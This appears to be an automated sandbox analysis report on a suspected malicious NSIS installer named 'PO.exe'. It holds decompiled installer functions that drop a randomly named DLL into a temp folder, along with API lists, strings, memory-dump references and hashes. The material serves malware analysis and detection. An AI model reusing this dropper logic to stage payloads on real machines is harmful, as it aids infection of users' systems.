							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
						}
						__eflags =  *0x7a2f8c;
						if( *0x7a2f8c != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								__eflags = _v8;
								if(_v8 == 0) {
									_t84 = GetTickCount();
									__eflags = _t84 - _t97;
									if(_t84 > _t97) {
										_v8 = CreateDialogParamA( *0x7a2f80, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
									}
								} else {
									E00405CFC(0);
								}
							}
							goto L22;
						}
						E00405670( &_v48, 0x795938, 0x1c);
						_t94 = _v48;
						__eflags = _t94 & 0xfffffff0;
						if((_t94 & 0xfffffff0) != 0) {
							goto L22;
						}
						__eflags = _v44 - 0xdeadbeef;
						if(_v44 != 0xdeadbeef) {
							goto L22;
						}
						__eflags = _v32 - 0x74736e49;
						if(_v32 != 0x74736e49) {
							goto L22;
						}
						__eflags = _v36 - 0x74666f73;
						if(_v36 != 0x74666f73) {
							goto L22;
						}
						__eflags = _v40 - 0x6c6c754e;
						if(_v40 != 0x6c6c754e) {
							goto L22;
						}
						_t89 = _v24;
						__eflags = _t89 - _t101;
						if(_t89 > _t101) {
							goto L33;
						}
						_a4 = _a4 | _t94;
						_t95 =  *0x789930; // 0x37ac1
						__eflags = _a4 & 0x00000008;
						 *0x7a2f8c = _t95;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t24 = _t89 - 4; // 0x1c
							_t101 = _t24;
							__eflags = _t92 - _t101;
							if(_t92 > _t101) {
								_t92 = _t101;
							}
							goto L22;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L15;
						L22:
						__eflags = _t101 -  *0x79d938; // 0x37ac5
						if(__eflags < 0) {
							_v16 = E00405D2F(_v16, 0x795938, _t92);
						}
						 *0x789930 =  *0x789930 + _t92;
						_t101 = _t101 - _t92;
						__eflags = _t101;
					} while (_t101 > 0);
					__eflags = _v8;
					if(_v8 != 0) {
						DestroyWindow(_v8);
					}
					goto L27;
				}
			}

0x00402c42
0x00402c45
0x00402c4b
0x00402c4e
0x00402c51
0x00402c64
0x00402c6a
0x00402c7d
0x00402c82
0x00402c85
0x00402c8b
0x00000000
0x00402c8d
0x00402c98
0x00402ca0
0x00402ca6
0x00402ca8
0x00402cad
0x00402caf
0x00402dde
0x00402de0
0x00402de6
0x00000000
0x00000000
0x00402de8
0x00402deb
0x00402e0f
0x00402e1a
0x00402e25
0x00402e2a
0x00402e2d
0x00402e2e
0x00402e2f
0x00402e31
0x00402e36
0x00402e39
0x00402e5a
0x00402e5e
0x00402e64
0x00402e66
0x00402e66
0x00402e66
0x00402e6e
0x00402e72
0x00402e79
0x00402e7e
0x00402e80
0x00402e80
0x00402e80
0x00402e88
0x00402e88
0x00402e8b
0x00402e8c
0x00402e8c
0x00402e8f
0x00402e91
0x00402e91
0x00402e91
0x00402e9b
0x00402ea1
0x00402eaf
0x00402eb4
0x00000000
0x00402eb4
0x00402e3c
0x00000000
0x00402e3c
0x00402df3
0x00402dfe
0x00402e03
0x00402e05
0x00000000
0x00000000
0x00402e0a
0x00402e0d
0x00000000
0x00000000
0x00000000
0x00402cb5
0x00402cb5
0x00402cba
0x00402cbe
0x00402cc5
0x00402cca
0x00402ccc
0x00402cce
0x00402cce
0x00402cd6
0x00402cdb
0x00402cdd
0x00402e49
0x00402e4d
0x00402e52
0x00402e52
0x00402e42
0x00000000
0x00402e42
0x00402ce5
0x00402ceb
0x00402d6c
0x00402d70
0x00402d72
0x00402d75
0x00402d7f
0x00402d85
0x00402d87
0x00402da3
0x00402da3
0x00402d77
0x00402d78
0x00402d78
0x00402d75
0x00000000
0x00402d70
0x00402cf8
0x00402cfd
0x00402d00
0x00402d06
0x00000000
0x00000000
0x00402d0c
0x00402d13
0x00000000
0x00000000
0x00402d19
0x00402d20
0x00000000
0x00000000
0x00402d26
0x00402d2d
0x00000000
0x00000000
0x00402d2f
0x00402d36
0x00000000
0x00000000
0x00402d38
0x00402d3b
0x00402d3d
0x00000000
0x00000000
0x00402d43
0x00402d46
0x00402d4c
0x00402d50
0x00402d56
0x00402d5e
0x00402d5e
0x00402d61
0x00402d61
0x00402d64
0x00402d66
0x00402d68
0x00402d68
0x00000000
0x00402d66
0x00402d58
0x00402d5c
0x00000000
0x00000000
0x00000000
0x00402da6
0x00402da6
0x00402dac
0x00402dbc
0x00402dbc
0x00402dbf
0x00402dc5
0x00402dc7
0x00402dc7
0x00402dcf
0x00402dd3
0x00402dd8
0x00402dd8
0x00000000
0x00402dd3

APIs

GetTickCount.KERNEL32 ref: 00402C45
GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402C6A

Part of subcall function 00405690: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
Part of subcall function 00405690: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6

GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402CA0
DestroyWindow.USER32(00000000,00795938,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402DD8
GlobalAlloc.KERNEL32(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402E14

Strings

soft, xrefs: 00402D26
Error launching installer, xrefs: 00402C8D
The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37
verifying installer: %d%%, xrefs: 00402D89
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
"C:\Users\user\Desktop\PO.exe" , xrefs: 00402C41
Null, xrefs: 00402D2F
C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
Inst, xrefs: 00402D19

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
String ID: "C:\Users\user\Desktop\PO.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
API String ID: 2181728824-1242243482
Opcode ID: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
Instruction ID: 2bc3342fd27a022da09e110317cf5b670322b105189d6b48e3606e9cef6b214d
Opcode Fuzzy Hash: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
Instruction Fuzzy Hash: 8561CE30900215EBDB219F64DE49B9EBBB4BF45714F20813AF900B22E2D7BC9D418B9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040179D, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E0040179D(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				long _t49;
				long _t62;
				signed char _t63;
				long _t64;
				void* _t66;
				long _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t82;
				CHAR* _t84;
				void* _t87;

				_t77 = __ebx;
				_t84 = E00402A9A(0x31);
				 *(_t87 - 0x34) = _t84;
				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
				_t33 = E00405538(_t84);
				_push(_t84);
				if(_t33 == 0) {
					lstrcatA(E004054CC(E004059BF(0x409c18, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c18);
					E004059BF();
				}
				E00405BFB(0x409c18);
				while(1) {
					__eflags =  *(_t87 + 8) - 3;
					if( *(_t87 + 8) >= 3) {
						_t66 = E00405C94(0x409c18);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t87 - 0x18);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t87 + 8) = _t72;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) == _t77) {
						_t63 = GetFileAttributesA(0x409c18); // executed
						_t64 = _t63 & 0x000000fe;
						__eflags = _t64;
						SetFileAttributesA(0x409c18, _t64); // executed
					}
					__eflags =  *(_t87 + 8) - 1;
					_t41 = E00405690(0x409c18, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t87 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) != _t77) {
						E00404D62(0xffffffe2,  *(_t87 - 0x34));
						__eflags =  *(_t87 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t87 - 4)) = 1;
						}
						L31:
						 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t87 - 4));
						__eflags =  *0x7a3008;
						goto L32;
					} else {
						E004059BF(0x40a418, 0x7a4000);
						E004059BF(0x7a4000, 0x409c18);
						E004059E1(_t77, 0x40a418, 0x409c18, "C:\Users\alfons\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll",  *((intOrPtr*)(_t87 - 0x10)));
						E004059BF(0x7a4000, 0x40a418);
						_t62 = E004052BF("C:\Users\alfons\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll",  *(_t87 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x7a3008 =  *0x7a3008 + 1;
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c18);
								_push(0xfffffffa);
								E00404D62();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404D62(0xffffffea,  *(_t87 - 0x34));
				 *0x4092a0 =  *0x4092a0 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t87 - 8));
				_push( *((intOrPtr*)(_t87 - 0x1c)));
				_t43 = E00402EBD(); // executed
				 *0x4092a0 =  *0x4092a0 - 1;
				__eflags =  *(_t87 - 0x18) - 0xffffffff;
				_t82 = _t43;
				if( *(_t87 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t87 - 8)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffee);
					} else {
						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffe9);
						lstrcatA(0x409c18,  *(_t87 - 0x34));
					}
					_push(0x200010);
					_push(0x409c18);
					E004052BF();
					goto L29;
				}
				goto L33;
			}

0x0040179d
0x004017a4
0x004017ad
0x004017b0
0x004017b3
0x004017b8
0x004017c0
0x004017dc
0x004017c2
0x004017c2
0x004017c3
0x004017c3
0x004017e2
0x004017ec
0x004017ec
0x004017f0
0x004017f3
0x004017f8
0x004017fa
0x004017fc
0x00401801
0x00401801
0x0040180c
0x0040180c
0x0040181d
0x0040181f
0x0040181f
0x00401820
0x00401820
0x00401823
0x00401826
0x00401829
0x0040182f
0x0040182f
0x00401833
0x00401833
0x0040183b
0x0040184a
0x0040184f
0x00401852
0x00401855
0x00000000
0x00000000
0x00401857
0x0040185a
0x004018b4
0x004018b9
0x004015ca
0x004026da
0x004026da
0x0040292f
0x00402932
0x00402932
0x00000000
0x0040185c
0x00401862
0x0040186d
0x0040187a
0x00401885
0x0040189b
0x0040189b
0x0040189e
0x00000000
0x004018a4
0x004018a4
0x004018a5
0x004018c2
0x00402938
0x00402938
0x00402938
0x004018a7
0x004018a7
0x004018a8
0x00401495
0x00402293
0x00402293
0x00402293
0x004018a5
0x0040189e
0x0040293a
0x0040293e
0x0040293e
0x004018d2
0x004018d7
0x004018dd
0x004018de
0x004018df
0x004018e2
0x004018e5
0x004018ea
0x004018f0
0x004018f4
0x004018f6
0x004018fe
0x0040190a
0x004018f8
0x004018f8
0x004018fc
0x00000000
0x00000000
0x004018fc
0x00401913
0x00401919
0x0040191b
0x00000000
0x00401921
0x00401921
0x00401924
0x0040193c
0x00401926
0x00401929
0x00401932
0x00401932
0x00401941
0x00401946
0x0040228e
0x00000000
0x0040228e
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
CompareFileTime.KERNEL32(-00000014,?,Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
GetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
SetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,00000000), ref: 00401833

Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC

Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004017CA
C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll, xrefs: 00401875, 00401891
Ivlfdpdlcleoxmzl, xrefs: 004017B9, 004017C2, 004017E1, 004017F2, 00401828, 00401832, 00401849, 00401867, 004018A7, 00401928, 00401931, 0040193B, 00401946

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll$Ivlfdpdlcleoxmzl
API String ID: 1152937526-2928673490
Opcode ID: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
Instruction ID: f975a3bedda6f2933beab8fd4359c2ae6630d988b8a67772af92d786c35f871c
Opcode Fuzzy Hash: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
Instruction Fuzzy Hash: 0141E471901504BBDF117FA5CD869AF3AA9EF42328B20423BF512F11E1C73C4A41CAAD

Uniqueness

Uniqueness Score: -1.00%

Function 00402EBD, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 173
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t68;
				void* _t69;
				int _t74;
				long _t75;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				void* _t99;
				void* _t100;
				long _t101;
				int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t99 = _a12;
				_v12 = _t102;
				if(_t99 == 0) {
					_v12 = 0x8000;
				}
				_v8 = 0;
				_v16 = _t99;
				if(_t99 == 0) {
					_v16 = 0x78d938;
				}
				_t66 = _a4;
				if(_a4 >= 0) {
					E004030FF( *0x7a2fd8 + _t66);
				}
				_t68 = E004030CD( &_a16, 4); // executed
				if(_t68 == 0) {
					L44:
					_push(0xfffffffd);
					goto L45;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t99 != 0) {
							if(_a16 < _t102) {
								_t102 = _a16;
							}
							if(E004030CD(_t99, _t102) != 0) {
								_v8 = _t102;
								L47:
								return _v8;
							} else {
								goto L44;
							}
						}
						if(_a16 <= 0) {
							goto L47;
						}
						while(1) {
							_t103 = _v12;
							if(_a16 < _t103) {
								_t103 = _a16;
							}
							if(E004030CD(0x789938, _t103) == 0) {
								goto L44;
							}
							_t74 = WriteFile(_a8, 0x789938, _t103,  &_a12, 0); // executed
							if(_t74 == 0 || _t103 != _a12) {
								L30:
								_push(0xfffffffe);
								L45:
								_pop(_t69);
								return _t69;
							} else {
								_v8 = _v8 + _t103;
								_a16 = _a16 - _t103;
								if(_a16 > 0) {
									continue;
								}
								goto L47;
							}
						}
						goto L44;
					}
					_t75 = GetTickCount();
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_v20 = _t75;
					 *0x40b038 = 0xb;
					 *0x40b050 = 0;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L47;
					}
					while(1) {
						L10:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E004030CD(0x789938, _t104) == 0) {
							goto L44;
						}
						_a16 = _a16 - _t104;
						 *0x40b028 = 0x789938;
						 *0x40b02c = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b030 = _t100;
							 *0x40b034 = _v12;
							_t79 = E00405D9D(0x40b028);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40b030; // 0x78e938
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x4092a0 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404D62(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L10;
								}
								goto L47;
							} else {
								if(_a12 != 0) {
									_v12 = _v12 - _t106;
									_v8 = _v8 + _t106;
									_t82 =  *0x40b030; // 0x78e938
									_v16 = _t82;
									if(_v12 < 1) {
										goto L47;
									}
									L25:
									if(_v28 != 4) {
										continue;
									}
									goto L47;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L30;
								} else {
									_v8 = _v8 + _t106;
									goto L25;
								}
							}
						}
						_push(0xfffffffc);
						goto L45;
					}
					goto L44;
				}
			}

0x00402ec5
0x00402ec9
0x00402ed0
0x00402ed3
0x00402ed5
0x00402ed5
0x00402ede
0x00402ee1
0x00402ee4
0x00402ee6
0x00402ee6
0x00402eed
0x00402ef2
0x00402efd
0x00402efd
0x00402f08
0x00402f0f
0x004030bb
0x004030bb
0x00000000
0x00402f15
0x00402f19
0x0040305e
0x004030ab
0x004030ad
0x004030ad
0x004030b9
0x004030c0
0x004030c3
0x00000000
0x00000000
0x00000000
0x00000000
0x004030b9
0x00403063
0x00000000
0x00000000
0x0040306a
0x0040306a
0x00403070
0x00403072
0x00403072
0x0040307e
0x00000000
0x00000000
0x0040308b
0x00403093
0x00403058
0x00403058
0x004030bd
0x004030bd
0x00000000
0x0040309a
0x0040309a
0x0040309d
0x004030a4
0x00000000
0x00000000
0x00000000
0x004030a6
0x00403093
0x00000000
0x0040306a
0x00402f1f
0x00402f25
0x00402f25
0x00402f2c
0x00402f32
0x00402f39
0x00402f3f
0x00402f42
0x00000000
0x00000000
0x00402f4d
0x00402f4d
0x00402f4d
0x00402f55
0x00402f57
0x00402f57
0x00402f63
0x00000000
0x00000000
0x00402f69
0x00402f6c
0x00402f72
0x00402f78
0x00402f78
0x00402f83
0x00402f89
0x00402f8e
0x00402f95
0x00402f98
0x00000000
0x00000000
0x00402f9e
0x00402fa4
0x00402fa6
0x00402fb3
0x00402fb5
0x00402fe3
0x00402fe9
0x00402ff2
0x00402ff7
0x00402ff7
0x00402ffe
0x0040304c
0x00000000
0x00000000
0x00000000
0x00403000
0x00403003
0x00403025
0x00403028
0x0040302b
0x00403034
0x00403037
0x00000000
0x00000000
0x0040303d
0x00403041
0x00000000
0x00000000
0x00000000
0x00403047
0x00403011
0x00403019
0x00000000
0x00403020
0x00403020
0x00000000
0x00403020
0x00403019
0x00402ffe
0x00403054
0x00000000
0x00403054
0x00000000
0x00402f4d

APIs

GetTickCount.KERNEL32 ref: 00402F1F
GetTickCount.KERNEL32 ref: 00402FA6
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FD3
wsprintfA.USER32 ref: 00402FE3
WriteFile.KERNELBASE(00000000,00000000,0078E938,7FFFFFFF,00000000), ref: 00403011

Strings

8x, xrefs: 00402F83, 00402F9E, 0040302B
... %d%%, xrefs: 00402FDD

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%$8x
API String ID: 4209647438-795837185
Opcode ID: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
Instruction ID: 8577ea5e15ae9603690e1c5729624cd70e3502ed31cd2bd6b1ef147789401905
Opcode Fuzzy Hash: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
Instruction Fuzzy Hash: 9E61AB3191220AEBCF10DF65DA48A9F7BB8EB04755F10417BF911B32C0D3789A40CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 025011EB, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 335memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 025014EE
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0250154A

Strings

487b87552a0b4b65815e43592edfd793, xrefs: 025015B7, 025015BA

Memory Dump Source

Source File: 00000000.00000002.242361529.0000000002500000.00000040.00000001.sdmp, Offset: 02500000, based on PE: false

Similarity

API ID: AllocCreateFileVirtual
String ID: 487b87552a0b4b65815e43592edfd793
API String ID: 1475775534-2060055787
Opcode ID: a5c8caf4a72819d82c5b3eda0b5fa3dd167e0b6dd79345e54a02e79d7699b704
Instruction ID: 2d627e62fbe9ac21d91d84d5764d1d1177b20a83e036e4e653cf25ef5058b998
Opcode Fuzzy Hash: a5c8caf4a72819d82c5b3eda0b5fa3dd167e0b6dd79345e54a02e79d7699b704
Instruction Fuzzy Hash: 36D14931D54388EEEB21DBE4DC46BEDBBB5BF04710F10409AE648BA1D1D7B50A84DB1A

Uniqueness

Uniqueness Score: -1.00%

Function 02500719, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 0250081B
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 025009E8

Memory Dump Source

Source File: 00000000.00000002.242361529.0000000002500000.00000040.00000001.sdmp, Offset: 02500000, based on PE: false

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 375998578de314d3500785fa08c7003a2fd6f66092efc6279e09e04c42f1dc26
Instruction ID: 378a6c845788331e6dbe4d4f53507e788164057f90cc08b87584fe629484d61d
Opcode Fuzzy Hash: 375998578de314d3500785fa08c7003a2fd6f66092efc6279e09e04c42f1dc26
Instruction Fuzzy Hash: 59A1DF75D00209EFEF10CBE4CD89BADBBB1BF18316F20885AE515BA2E0D7745A40DB19

Uniqueness

Uniqueness Score: -1.00%

Function 004015D5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t27;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A9A(0xfffffff0);
				_t27 = E0040555F(_t25);
				if( *_t25 != __ebx && _t27 != __ebx) {
					do {
						_t29 = E004054F7(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L5:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L5;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401428();
				} else {
					E00401428(0xffffffe6);
					E004059BF("C:\\Users\\alfons\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x004015d5
0x004015dc
0x004015e6
